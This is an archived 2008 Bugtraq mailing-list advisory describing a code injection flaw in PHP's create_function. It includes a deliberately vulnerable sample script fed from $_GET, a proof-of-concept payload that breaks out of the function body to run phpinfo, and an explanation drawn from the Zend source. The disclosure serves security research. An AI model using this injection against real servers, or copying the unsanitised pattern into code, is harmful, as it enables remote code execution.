php create_function commond injection vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: php create_function commond injection vulnerability
From: root@xxxxxxxxx
Date: Wed, 24 Sep 2008 20:30:32 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

php use create_function function to CREATE an anonymous function like 
below(stolen from php_manual):

--------------------------------------------------
Description
string create_function ( string args, string code )


Creates an anonymous function from the parameters passed, and returns a unique 
name for it. Usually the args will be passed as a single quote delimited 
string, and this is also recommended for the code. The reason for using single 
quoted strings, is to protect the variable names from parsing, otherwise, if 
you use double quotes there will be a need to escape the variable names, e.g. 
\$avar.

You can use this function, to (for example) create a function from information 
gathered at run time: 

1. Creating an anonymous function with create_function() 

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * 
$b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
// outputs
// New anonymous function: lambda_1
// ln(2) + ln(2.718281828459) = 1.6931471805599
?>  
 
........

But 80sec found there is a commond injection in this function,you can EXECUTE 
your php code  directly but not CREATE a lambda-style function.It is very 
useful when sometimes you can create a function but cann't call your 
function.Check code below:

<?php
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = '
            return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . 
'($a["' . $sort_by . 
'"], $b["' . $sort_by . '"]);
        ';


usort($databases, create_function('$a, $b', $sort_function));

?>

Yes,you can create a function,but because the $databases has only one value,the 
function never be called,so your injected code cann't be executed :),but when 
you input like this:

test.php?sort_by="]);}phpinfo();/*

Bingo,phpinfo executed in create_function,you needn't call the function at all!

Create_function is a ZEND_FUNCTION in php,it is defined in 
./Zend/zend_builtin_functions.c :

......
       eval_code = (char *) emalloc(eval_code_length);
        sprintf(eval_code, "function " LAMBDA_TEMP_FUNCNAME "(%s){%s}", 
Z_STRVAL_PP(z_function_args), Z_STRVAL_PP(z_function_code));

        eval_name = zend_make_compiled_string_description("runtime-created 
function" TSRMLS_CC);
        retval = zend_eval_string(eval_code, NULL, eval_name TSRMLS_CC);

......

It simply use zend_eval_string to do this work,which execute "function " 
LAMBDA_TEMP_FUNCNAME "(%s){%s}".As you see,you can easily use '}' to close 
'}',and other codes is executed by zend_eval_string runtime :) 

From:http://www.80sec.com

Prev by Date: [security bulletin] HPSBOV02364 SSRT080078 rev.3 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access
Next by Date: [security bulletin] HPSBST02372 SSRT080133 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-052 to MS08-055
Previous by thread: [security bulletin] HPSBOV02364 SSRT080078 rev.3 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access
Next by thread: Re: php create_function commond injection vulnerability
Index(es):
- Date
- Thread